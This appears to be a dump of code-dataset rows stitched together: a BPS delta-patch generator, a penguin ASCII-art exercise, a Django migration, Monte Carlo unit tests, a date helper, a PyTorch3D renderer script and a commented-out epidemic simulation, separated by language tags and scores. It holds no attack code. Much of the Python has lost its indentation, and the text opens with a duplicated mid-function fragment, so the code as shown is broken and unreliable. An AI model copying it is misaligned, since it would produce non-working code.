targetEncodingOffset = 0
# Keep track of blocks seen in the part of the target buffer before
# targetWriteOffset. Because targetWriteOffset does not always advance by
# an even multiple of the blocksize, there can be some lag between when
# targetWriteOffset moves past a particular byte, and when that byte's
# block is added to targetmap.
targetmap = BlockMap()
targetblocks = iter_blocks(target, blocksize)
# Points to the byte just beyond the most recent block added to targetmap;
# the difference between this and targetWriteOffset measures the 'some lag'
# described above.
nextTargetMapBlockOffset = 0
# A place to store operations before we spit them out. This gives us an
# opportunity to replace operations if we later come across a better
# alternative encoding.
opbuf = ops.OpBuffer(target)
while targetEncodingOffset < len(target):
# Keeps track of the most efficient operation for encoding this
# particular offset that we've found so far.
bestOp = None
bestOpEfficiency = 0
bestOpBackSpan = 0
bestOpForeSpan = 0
blockend = targetEncodingOffset + blocksize
block = target[targetEncodingOffset:blockend]
for sourceOffset in sourcemap.get_block(block):
backspan, forespan = measure_op(
source, sourceOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
if sourceOffset == targetEncodingOffset:
candidate = ops.SourceRead(backspan+forespan)
else:
candidate = ops.SourceCopy(
backspan+forespan,
sourceOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
for targetOffset in targetmap.get_block(block):
backspan, forespan = measure_op(
target, targetOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
candidate = ops.TargetCopy(
backspan+forespan,
targetOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
# If we can't find a copy instruction that encodes this block, or the
# best one we've found is a net efficiency loss, we'll have to issue
# a TargetRead... later.
if bestOp is None or bestOpEfficiency < 1.0:
targetEncodingOffset += 1
continue
# We found an encoding for the target block, so issue a TargetRead for
# all the bytes from the end of the last block up to now.
if targetWriteOffset < targetEncodingOffset:
tr = ops.TargetRead(target[targetWriteOffset:targetEncodingOffset])
opbuf.append(tr)
targetWriteOffset = targetEncodingOffset
opbuf.append(bestOp, rollback=bestOpBackSpan)
targetWriteOffset += bestOpForeSpan
# The next block we want to encode starts after the bytes we've
# just written.
targetEncodingOffset = targetWriteOffset
# If it's been more than BLOCKSIZE bytes since we added a block to
# targetmap, process the backlog.
while (targetWriteOffset - nextTargetMapBlockOffset) >= blocksize:
newblock, offset = next(targetblocks)
targetmap.add_block(newblock, offset)
nextTargetMapBlockOffset = offset + len(newblock)
for op in opbuf:
yield op
if targetWriteOffset < len(target):
# It's TargetRead all the way up to the end of the file.
yield ops.TargetRead(target[targetWriteOffset:])
yield ops.SourceCRC32(crc32(source))
yield ops.TargetCRC32(crc32(target))
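# --- Usage sketch (not part of the original module) ---
# diff_bytearrays is a generator; a caller would normally hand each
# operation to the package's patch writer. Bare inspection works too:
# for op in diff_bytearrays(64, b'old data' * 64, b'new data' * 64):
#     print(op)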
| # This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# the COPYING file included with this distribution or
# http://sam.zoy.org/wtfpl/COPYING for more details.
"""
Tools for creating BPS patches.
For more information about the basic algorithm used here, see the article
"Intro to Delta Encoding":
https://gitorious.org/python-blip/pages/IntroToDeltaEncoding
"""
from zlib import crc32
from bps import operations as ops
from bps.util import BlockMap
def iter_blocks(data, blocksize):
    """
    Yield the blocksize-byte block that starts at every offset of data.

    Consecutive blocks overlap: the offset advances by one byte rather
    than by blocksize, so every possible alignment gets indexed.
    """
    offset = 0
    while offset < len(data):
        block = data[offset:offset+blocksize]
        yield (block, offset)
        offset += 1
def measure_op(blocksrc, sourceoffset, target, targetoffset):
"""
Measure the match between blocksrc and target at these offsets.
"""
# The various parameters line up something like this:
#
# v-- sourceoffset
# ...ABCDExGHI... <-- blocksrc
#
# ...xxxABCDEF... <-- target
# ^-- targetOffset
#
# result: backspan = 2, forespan = 3
#
# Measure how far back the source and target files match from these
# offsets.
backspan = 0
# We need the +1 here because the test inside the loop is actually looking
# at the byte *before* the one pointed to by (sourceoffset-backspan), so
# we need our span to stretch that little bit further.
maxspan = min(sourceoffset, targetoffset) + 1
for backspan in range(maxspan):
if blocksrc[sourceoffset-backspan-1] != target[targetoffset-backspan-1]:
break
# Measure how far forward the source and target files are aligned.
forespan = 0
sourcespan = len(blocksrc) - sourceoffset
targetspan = len(target) - targetoffset
maxspan = min(sourcespan, targetspan)
for forespan in range(maxspan):
if blocksrc[sourceoffset+forespan] != target[targetoffset+forespan]:
break
else:
# We matched right up to the end of the file.
forespan += 1
return backspan, forespan
def diff_bytearrays(blocksize, source, target, metadata=""):
"""
Yield a sequence of patch operations that transform source to target.
"""
yield ops.Header(len(source), len(target), metadata)
# We assume the entire source file will be available when applying this
# patch, so load the entire thing into the block map.
sourcemap = BlockMap()
for block, offset in iter_blocks(source, blocksize):
sourcemap.add_block(block, offset)
# Points at the next byte of the target buffer that needs to be encoded.
targetWriteOffset = 0
# Points at the next byte of the target buffer we're searching for
# encodings for. If we can't find an encoding for a particular byte, we'll
# leave targetWriteOffset alone and increment this offset, on the off
# chance that we find a new encoding that we can extend backwards to
# targetWriteOffset.
targetEncodingOffset = 0
# Keep track of blocks seen in the part of the target buffer before
# targetWriteOffset. Because targetWriteOffset does not always advance by
# an even multiple of the blocksize, there can be some lag between when
# targetWriteOffset moves past a particular byte, and when that byte's
# block is added to targetmap.
targetmap = BlockMap()
targetblocks = iter_blocks(target, blocksize)
# Points to the byte just beyond the most recent block added to targetmap;
# the difference between this and targetWriteOffset measures the 'some lag'
# described above.
nextTargetMapBlockOffset = 0
# A place to store operations before we spit them out. This gives us an
# opportunity to replace operations if we later come across a better
# alternative encoding.
opbuf = ops.OpBuffer(target)
while targetEncodingOffset < len(target):
# Keeps track of the most efficient operation for encoding this
# particular offset that we've found so far.
bestOp = None
bestOpEfficiency = 0
bestOpBackSpan = 0
bestOpForeSpan = 0
blockend = targetEncodingOffset + blocksize
block = target[targetEncodingOffset:blockend]
for sourceOffset in sourcemap.get_block(block):
backspan, forespan = measure_op(
source, sourceOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
if sourceOffset == targetEncodingOffset:
candidate = ops.SourceRead(backspan+forespan)
else:
candidate = ops.SourceCopy(
backspan+forespan,
sourceOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
for targetOffset in targetmap.get_block(block):
backspan, forespan = measure_op(
target, targetOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
candidate = ops.TargetCopy(
backspan+forespan,
targetOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
# If we can't find a copy instruction that encodes this block, or the
# best one we've found is a net efficiency loss, we'll have to issue
# a TargetRead... later.
if bestOp is None or bestOpEfficiency < 1.0:
targetEncodingOffset += 1
continue
# We found an encoding for the target block, so issue a TargetRead for
# all the bytes from the end of the last block up to now.
if targetWriteOffset < targetEncodingOffset:
tr = ops.TargetRead(target[targetWriteOffset:targetEncodingOffset])
opbuf.append(tr)
targetWriteOffset = targetEncodingOffset
opbuf.append(bestOp, rollback=bestOpBackSpan)
targetWriteOffset += bestOpForeSpan
# The next block we want to encode starts after the bytes we've
# just written.
targetEncodingOffset = targetWriteOffset
# If it's been more than BLOCKSIZE bytes since we added a block to
# targetmap, process the backlog.
while (targetWriteOffset - nextTargetMapBlockOffset) >= blocksize:
newblock, offset = next(targetblocks)
targetmap.add_block(newblock, offset)
nextTargetMapBlockOffset = offset + len(newblock)
for op in opbuf:
yield op
if targetWriteOffset < len(target):
# It's TargetRead all the way up to the end of the file.
yield ops.TargetRead(target[targetWriteOffset:])
yield ops.SourceCRC32(crc32(source))
yield ops.TargetCRC32(crc32(target))
| en | 0.896223 | # This program is free software. It comes without any warranty, to # the extent permitted by applicable law. You can redistribute it # and/or modify it under the terms of the Do What The Fuck You Want # To Public License, Version 2, as published by Sam Hocevar. See # the COPYING file included with this distribution or # http://sam.zoy.org/wtfpl/COPYING for more details. Tools for creating BPS patches. For more information about the basic algorithm used here, see the article "Intro to Delta Encoding": https://gitorious.org/python-blip/pages/IntroToDeltaEncoding Measure the match between blocksrc and target at these offsets. # The various parameters line up something like this: # # v-- sourceoffset # ...ABCDExGHI... <-- blocksrc # # ...xxxABCDEF... <-- target # ^-- targetOffset # # result: backspan = 2, forespan = 3 # # Measure how far back the source and target files match from these # offsets. # We need the +1 here because the test inside the loop is actually looking # at the byte *before* the one pointed to by (sourceoffset-backspan), so # we need our span to stretch that little bit further. # Measure how far forward the source and target files are aligned. # We matched right up to the end of the file. Yield a sequence of patch operations that transform source to target. # We assume the entire source file will be available when applying this # patch, so load the entire thing into the block map. # Points at the next byte of the target buffer that needs to be encoded. # Points at the next byte of the target buffer we're searching for # encodings for. If we can't find an encoding for a particular byte, we'll # leave targetWriteOffset alone and increment this offset, on the off # chance that we find a new encoding that we can extend backwards to # targetWriteOffset. # Keep track of blocks seen in the part of the target buffer before # targetWriteOffset. Because targetWriteOffset does not always advance by # an even multiple of the blocksize, there can be some lag between when # targetWriteOffset moves past a particular byte, and when that byte's # block is added to targetmap. # Points to the byte just beyond the most recent block added to targetmap; # the difference between this and targetWriteOffset measures the 'some lag' # described above. # A place to store operations before we spit them out. This gives us an # opportunity to replace operations if we later come across a better # alternative encoding. # Keeps track of the most efficient operation for encoding this # particular offset that we've found so far. # This block actually doesn't occur at this sourceOffset after # all. Perhaps it's a hash collision? # This block actually doesn't occur at this sourceOffset after # all. Perhaps it's a hash collision? # If we can't find a copy instruction that encodes this block, or the # best one we've found is a net efficiency loss, we'll have to issue # a TargetRead... later. # We found an encoding for the target block, so issue a TargetRead for # all the bytes from the end of the last block up to now. # The next block we want to encode starts after the bytes we've # just written. # If it's been more than BLOCKSIZE bytes since we added a block to # targetmap, process the backlog. # It's TargetRead all the way up to the end of the file. | 2.480039 | 2 |
Week_1/ex2.py | babosina/Coursera-Python-HSE | 0 | 6616694 | <gh_stars>0
"""
Write a program that, for a given number N from 1 to 9, prints N penguins to the screen.
A single penguin image is 5×9 characters; between two adjacent penguins there is also an empty column (of spaces).
Printing an empty column after the last penguin is allowed.
"""
number = int(input())
print(' _~_ ' * number, ' ' * number, end=' \n')
print(' (o o) ' * number, end=' \n')
print(' / V \\ ' * number, end=' \n')
print('/( _ )\\ ' * number, end=' \n')
print(' ^^ ^^ ' * number, end=' ')
| """
Write a program that, for a given number N from 1 to 9, prints N penguins to the screen.
A single penguin image is 5×9 characters; between two adjacent penguins there is also an empty column (of spaces).
Printing an empty column after the last penguin is allowed.
"""
number = int(input())
print(' _~_ ' * number, ' ' * number, end=' \n')
print(' (o o) ' * number, end=' \n')
print(' / V \\ ' * number, end=' \n')
print('/( _ )\\ ' * number, end=' \n')
print(' ^^  ^^   ' * number, end=' ') | ru | 0.995358 | Write a program that, for a given number N from 1 to 9, prints N penguins to the screen. A single penguin image is 5×9 characters; between two adjacent penguins there is also an empty column (of spaces). Printing an empty column after the last penguin is allowed. | 4.344246 | 4 |
scieio/sellers/migrations/0004_auto_20200418_0002.py | arnelimperial/scieio | 0 | 6616695 | # Generated by Django 3.0.5 on 2020-04-17 21:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sellers', '0003_auto_20200417_2352'),
]
operations = [
migrations.AlterField(
model_name='seller',
name='return_policy',
field=models.TextField(default='No Return Policy Listed'),
),
migrations.AlterField(
model_name='seller',
name='shipping_policy',
field=models.TextField(default='No Shipping Policy Listed'),
),
]
| # Generated by Django 3.0.5 on 2020-04-17 21:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sellers', '0003_auto_20200417_2352'),
]
operations = [
migrations.AlterField(
model_name='seller',
name='return_policy',
field=models.TextField(default='No Return Policy Listed'),
),
migrations.AlterField(
model_name='seller',
name='shipping_policy',
field=models.TextField(default='No Shipping Policy Listed'),
),
]
| en | 0.792457 | # Generated by Django 3.0.5 on 2020-04-17 21:02 | 1.495492 | 1 |
group_project/vinnyharris-day5-hw/mc-package/mcsim/tests/test_mc.py | msse-2021-bootcamp/team2-project | 0 | 6616696 | """
Test for mcsim package - monte carlo module.
"""
import math
import mcsim.monte_carlo as mc
def test_calculate_distance_1():
"""
Test calculate distance function
"""
point1=[0,0,0]
point2=[0,1,0]
expected = 1
observed = mc.calculate_distance(point1,point2)
assert math.isclose(expected, observed)
# write a test for the calculate distance function which tests for the periodic boundary conditions
def test_calculate_distance_2():
"""
Test periodic boundary condition for calculate distance function
"""
point1=[0,0,0]
point2=[0,0,8]
box_length = 10
expected = 2
observed = mc.calculate_distance(point1,point2,box_length)
assert expected == observed
def test_calculate_LJ_1():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(1) == 0
def test_calculate_LJ_2():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(math.pow(2, (1/6))) == -1.0
def test_calculate_total_energy():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, math.pow(2, 1/6), 0], [0, 2*math.pow(2, 1/6), 0]]
assert mc.calculate_total_energy(coordinates, 10, 3.0) == -2.031005859375
def test_calculate_pair_energy_1():
    """
    Test calculating the pair energy of one particle with the rest
    """
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 1, 10, 3) == -2
def test_calculate_pair_energy_2():
    """
    Test that the pair energy is symmetric for the two end particles
    """
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 3) == mc.calculate_pair_energy(coordinates, 2, 10, 3)
def test_calculate_pair_energy_3():
    """
    Test the pair energy with a shorter cutoff distance
    """
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 2) == -1
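# These tests are collected by pytest; from the package root something like
# `pytest mcsim/tests/test_mc.py -v` (path per this repository's layout) runs them.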
| """
Test for mcsim package - monte carlo module.
"""
import math
import mcsim.monte_carlo as mc
def test_calculate_distance_1():
"""
Test calculate distance function
"""
point1=[0,0,0]
point2=[0,1,0]
expected = 1
observed = mc.calculate_distance(point1,point2)
assert math.isclose(expected, observed)
# write a test for the calculate distance function which tests for the periodic boundary conditions
def test_calculate_distance_2():
"""
Test periodic boundary condition for calculate distance function
"""
point1=[0,0,0]
point2=[0,0,8]
box_length = 10
expected = 2
observed = mc.calculate_distance(point1,point2,box_length)
assert expected == observed
def test_calculate_LJ_1():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(1) == 0
def test_calculate_LJ_2():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(math.pow(2, (1/6))) == -1.0
def test_calculate_total_energy():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, math.pow(2, 1/6), 0], [0, 2*math.pow(2, 1/6), 0]]
assert mc.calculate_total_energy(coordinates, 10, 3.0) == -2.031005859375
def test_calculate_pair_energy_1():
    """
    Test calculating the pair energy
    """
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 1, 10, 3) == -2
def test_calculate_pair_energy_2():
    """
    Test calculating the pair energy
    """
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 3) == mc.calculate_pair_energy(coordinates, 2, 10, 3)
def test_calculate_pair_energy_3():
    """
    Test calculating the pair energy
    """
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 2) == -1
| en | 0.627805 | Test for mcsim package - monte carlo module. Test calculate distance function # write a test for the calculate distance function which tests for the periodic boundary conditions Test periodic boundary condition for calculate distance function Test the Lennard Jones pair energy Test the Lennard Jones pair energy Test calculating the total energy Test calculating the total energy Test calculating the total energy Test calculating the total energy | 3.597975 | 4 |
2018-02/2018-02-04/get_infor.py | wenjuanchendora/Python_Study | 0 | 6616697 | import selenium
import sys
print(selenium.__version__)
print(sys.platform) | import selenium
import sys
print(selenium.__version__)
print(sys.platform) | none | 1 | 1.49398 | 1 | |
fantasydota/util/random_function.py | open-fantasy-league/fantasy-dota-heroes | 3 | 6616698 | import calendar
import datetime
def add_months(sourcedate,months):
month = sourcedate.month - 1 + months
    year = sourcedate.year + month // 12
month = month % 12 + 1
day = min(sourcedate.day,calendar.monthrange(year,month)[1])
return datetime.date(year,month,day)
def bprint(boring_string):
print "-_______---___-----_---_---_-__--_-------_--__---_--_-__--__-"
print boring_string
print "---___--__--_--_--__--_---------___---_----_---_--_---__---_--__--"
| import calendar
import datetime
def add_months(sourcedate,months):
month = sourcedate.month - 1 + months
    year = sourcedate.year + month // 12
month = month % 12 + 1
day = min(sourcedate.day,calendar.monthrange(year,month)[1])
return datetime.date(year,month,day)
def bprint(boring_string):
print "-_______---___-----_---_---_-__--_-------_--__---_--_-__--__-"
print boring_string
print "---___--__--_--_--__--_---------___---_----_---_--_---__---_--__--"
| none | 1 | 3.734083 | 4 | |
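For reference, a small self-contained usage sketch of the add_months helper from the entry above; the example dates are illustrative and not taken from the source.

import calendar
import datetime

def add_months(sourcedate, months):
    # Same logic as in the entry above, repeated here so the example runs standalone.
    month = sourcedate.month - 1 + months
    year = sourcedate.year + month // 12
    month = month % 12 + 1
    day = min(sourcedate.day, calendar.monthrange(year, month)[1])
    return datetime.date(year, month, day)

# The day is clamped to the target month's length: 31 Jan 2020 plus one month gives 29 Feb 2020 (leap year).
assert add_months(datetime.date(2020, 1, 31), 1) == datetime.date(2020, 2, 29)
# Crossing a year boundary backwards also works: 15 Jan 2020 minus three months gives 15 Oct 2019.
assert add_months(datetime.date(2020, 1, 15), -3) == datetime.date(2019, 10, 15)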
apps/RenderMeshes/main.py | sanjeevmk/Woodhouse | 0 | 6616699 | import argparse
from input_representation import mesh
from renderer.cameras import Camera
from renderer.rasterizer import Rasterizer
from renderer.lights import Lights
from renderer.shaders.basic_shader import Shader
from pytorch3d.renderer import MeshRenderer
from PIL import Image
def main(args):
mesh_path = args.mesh_path
mesh_instance = mesh.TriangleMesh(mesh_path=mesh_path)
mesh_instance.load_pytorch_mesh_from_file()
camera_instance = Camera()
camera_instance.lookAt(args.dist, args.elev, args.azim)
light_instance = Lights()
light_instance.setup_light([args.light_x, args.light_y, args.light_z])
rasterizer_instance = Rasterizer()
rasterizer_instance.init_rasterizer(camera_instance.camera)
shader_instance = Shader()
shader_instance.setup_shader(camera_instance.camera, light_instance.light)
renderer_instance = MeshRenderer(rasterizer=rasterizer_instance.rasterizer, shader=shader_instance.shader)
images = renderer_instance(mesh_instance.pytorch_mesh)
np_image = images[0].cpu().detach().numpy()*255.0
np_image = np_image.astype('uint8')
pil_image = Image.fromarray(np_image)
pil_image.save(args.out_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--mesh-path", help="Path to the mesh file")
parser.add_argument("--dist", type=float, help="Camera Distance")
parser.add_argument("--elev", type=float, help="Camera Elevation")
parser.add_argument("--azim", type=float, help="Camera Azimuth")
parser.add_argument("--light-x", type=float, help="Light X")
parser.add_argument("--light-y", type=float, help="Light Y")
parser.add_argument("--light-z", type=float, help="Light Z")
parser.add_argument("--out-path", help="Path to the output image")
args = parser.parse_args()
main(args)
| import argparse
from input_representation import mesh
from renderer.cameras import Camera
from renderer.rasterizer import Rasterizer
from renderer.lights import Lights
from renderer.shaders.basic_shader import Shader
from pytorch3d.renderer import MeshRenderer
from PIL import Image
def main(args):
mesh_path = args.mesh_path
mesh_instance = mesh.TriangleMesh(mesh_path=mesh_path)
mesh_instance.load_pytorch_mesh_from_file()
camera_instance = Camera()
camera_instance.lookAt(args.dist, args.elev, args.azim)
light_instance = Lights()
light_instance.setup_light([args.light_x, args.light_y, args.light_z])
rasterizer_instance = Rasterizer()
rasterizer_instance.init_rasterizer(camera_instance.camera)
shader_instance = Shader()
shader_instance.setup_shader(camera_instance.camera, light_instance.light)
renderer_instance = MeshRenderer(rasterizer=rasterizer_instance.rasterizer, shader=shader_instance.shader)
images = renderer_instance(mesh_instance.pytorch_mesh)
np_image = images[0].cpu().detach().numpy()*255.0
np_image = np_image.astype('uint8')
pil_image = Image.fromarray(np_image)
pil_image.save(args.out_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--mesh-path", help="Path to the mesh file")
parser.add_argument("--dist", type=float, help="Camera Distance")
parser.add_argument("--elev", type=float, help="Camera Elevation")
parser.add_argument("--azim", type=float, help="Camera Azimuth")
parser.add_argument("--light-x", type=float, help="Light X")
parser.add_argument("--light-y", type=float, help="Light Y")
parser.add_argument("--light-z", type=float, help="Light Z")
parser.add_argument("--out-path", help="Path to the output image")
args = parser.parse_args()
main(args)
| none | 1 | 2.475484 | 2 | |
run_sim.py | tdennisliu/covid19-forecasting-aus | 7 | 6616700 | <gh_stars>1-10
# This method of running simulations is deprecated in favour of run_state.py
# from sim_class import *
# import pandas as pd
# from sys import argv
# from numpy.random import beta, gamma
# #from joblib import Parallel, delayed
# import multiprocessing as mp
# def worker(arg):
# obj, methname = arg[:2]
# return getattr(obj,methname)(*arg[2:])
# n_sims=int(argv[1]) #number of sims
# time_end = int(argv[2])
# states = ['NSW','QLD','SA','TAS','VIC','WA','ACT','NT']
# #states = ['QLD','VIC']
# start_date = '2020-03-01'
# case_file_date = ['06Jul','0915']
# forecast_date = '2020-07-06'
# R_I='R_I'
# abc =False
# if R_I is not None:
# print("Using model output for R_L and R_I")
# local_detection = {
# 'NSW':0.5,#0.556,#0.65,
# 'QLD':0.4,#0.353,#0.493,#0.74,
# 'SA':0.38,#0.597,#0.75,
# 'TAS':0.3,#0.598,#0.48,
# 'VIC':0.56,#0.558,#0.77,
# 'WA':0.38,#0.409,#0.509,#0.66,
# 'ACT':0.8,#0.557,#0.65,
# 'NT':0.8,#0.555,#0.71
# }
# a_local_detection = {
# 'NSW':0.1,#0.556,#0.65,
# 'QLD':0.05,#0.353,#0.493,#0.74,
# 'SA':0.05,#0.597,#0.75,
# 'TAS':0.05,#0.598,#0.48,
# 'VIC':0.13,#0.558,#0.77,
# 'WA':0.05,#0.409,#0.509,#0.66,
# 'ACT':0.2,#0.557,#0.65,
# 'NT':0.2,#0.555,#0.71
# }
# qi_d = {
# 'NSW':0.95,#0.758,
# 'QLD':0.95,#0.801,
# 'SA':0.95,#0.792,
# 'TAS':0.95,#0.800,
# 'VIC':0.95,#0.735,
# 'WA':0.95,#0.792,
# 'ACT':0.95,#0.771,
# 'NT':0.95,#0.761
# }
# ##Initialise the number of cases as 1st of March data incidence
# current = {
# 'ACT':[0,0,0],
# 'NSW':[10,0,2], #1
# 'NT':[0,0,0],
# 'QLD':[2,0,0],
# 'SA':[2,0,0],
# 'TAS':[0,0,0],
# 'VIC':[2,0,0], #1
# 'WA':[0,0,0],
# }
# if len(argv)>=3:
# forecast_type = argv[3]
# else:
# forecast_type = None
# forecast_dict = {}
# for state in states:
# initial_people = ['I']*current[state][0] + \
# ['A']*current[state][1] + \
# ['S']*current[state][2]
# people = {}
# if abc:
# #qs_prior = beta(10,10,size=10000)
# #qi_prior = beta(17, 3, size=10000)
# #qa_prior = beta(3,7, size=10000)
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =np.maximum(0.1,np.minimum(2,gamma(4,0.25, size=1000)))
# ps_prior = beta(10,10,size=1000)
# else:
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =[1/2]
# ps_prior = 0.2
# ps_prior= [ps_prior]
# for i,cat in enumerate(initial_people):
# people[i] = Person(0,0,0,0,cat)
# if state in ['VIC']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['NSW']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['ACT','NT']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# else:
# forecast_dict[state] = Forecast(current[state],state,
# start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R = forecast_type , R_I = R_I,forecast_date=forecast_date,
# cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# if __name__ =="__main__":
# for key,item in forecast_dict.items():
# item.read_in_Reff()
# pool = mp.Pool(8)
# l_df_results =pool.map(worker,
# [(obj,'simulate_many',time_end, n_sims)
# for key,obj in forecast_dict.items()]
# )
# pool.close()
# pool.join()
# #record quantiles in separate file
# dic_states={
# 'state':[],
# 'date':[],
# 'type':[],
# 'bottom':[],
# 'lower':[],
# 'median':[],
# 'upper':[],
# 'top':[],
# }
# dates =pd.date_range(start = start_date,
# periods=time_end #num of days
# )
# vars_l = ['symp_inci_obs','imports_inci_obs','asymp_inci_obs','symp_inci','asymp_inci','imports_inci','total_inci','total_inci_obs']
# for var in vars_l:
# for state,df in l_df_results:
# df = df[[col.strftime('%Y-%m-%d') for
# col in dates]]
# quantiles = df.loc[var].quantile([0.05,0.25,0.5,0.75,0.95],axis=0)
# dic_states['state'].extend([state]*len(dates))
# dic_states['date'].extend(df.columns)
# dic_states['type'].extend([var]*len(dates))
# dic_states['bottom'].extend(quantiles.loc[0.05])
# dic_states['lower'].extend(quantiles.loc[0.25])
# dic_states['median'].extend(quantiles.loc[0.50])
# dic_states['upper'].extend(quantiles.loc[0.75])
# dic_states['top'].extend(quantiles.loc[0.95])
# plots =pd.DataFrame.from_dict(dic_states)
# plots.to_parquet('./results/quantiles'+forecast_type+start_date+"sim_"+str(n_sims)+"days_"+str(time_end)+".parquet")
| # This method of running simulations is deprecated in favour of run_state.py
# from sim_class import *
# import pandas as pd
# from sys import argv
# from numpy.random import beta, gamma
# #from joblib import Parallel, delayed
# import multiprocessing as mp
# def worker(arg):
# obj, methname = arg[:2]
# return getattr(obj,methname)(*arg[2:])
# n_sims=int(argv[1]) #number of sims
# time_end = int(argv[2])
# states = ['NSW','QLD','SA','TAS','VIC','WA','ACT','NT']
# #states = ['QLD','VIC']
# start_date = '2020-03-01'
# case_file_date = ['06Jul','0915']
# forecast_date = '2020-07-06'
# R_I='R_I'
# abc =False
# if R_I is not None:
# print("Using model output for R_L and R_I")
# local_detection = {
# 'NSW':0.5,#0.556,#0.65,
# 'QLD':0.4,#0.353,#0.493,#0.74,
# 'SA':0.38,#0.597,#0.75,
# 'TAS':0.3,#0.598,#0.48,
# 'VIC':0.56,#0.558,#0.77,
# 'WA':0.38,#0.409,#0.509,#0.66,
# 'ACT':0.8,#0.557,#0.65,
# 'NT':0.8,#0.555,#0.71
# }
# a_local_detection = {
# 'NSW':0.1,#0.556,#0.65,
# 'QLD':0.05,#0.353,#0.493,#0.74,
# 'SA':0.05,#0.597,#0.75,
# 'TAS':0.05,#0.598,#0.48,
# 'VIC':0.13,#0.558,#0.77,
# 'WA':0.05,#0.409,#0.509,#0.66,
# 'ACT':0.2,#0.557,#0.65,
# 'NT':0.2,#0.555,#0.71
# }
# qi_d = {
# 'NSW':0.95,#0.758,
# 'QLD':0.95,#0.801,
# 'SA':0.95,#0.792,
# 'TAS':0.95,#0.800,
# 'VIC':0.95,#0.735,
# 'WA':0.95,#0.792,
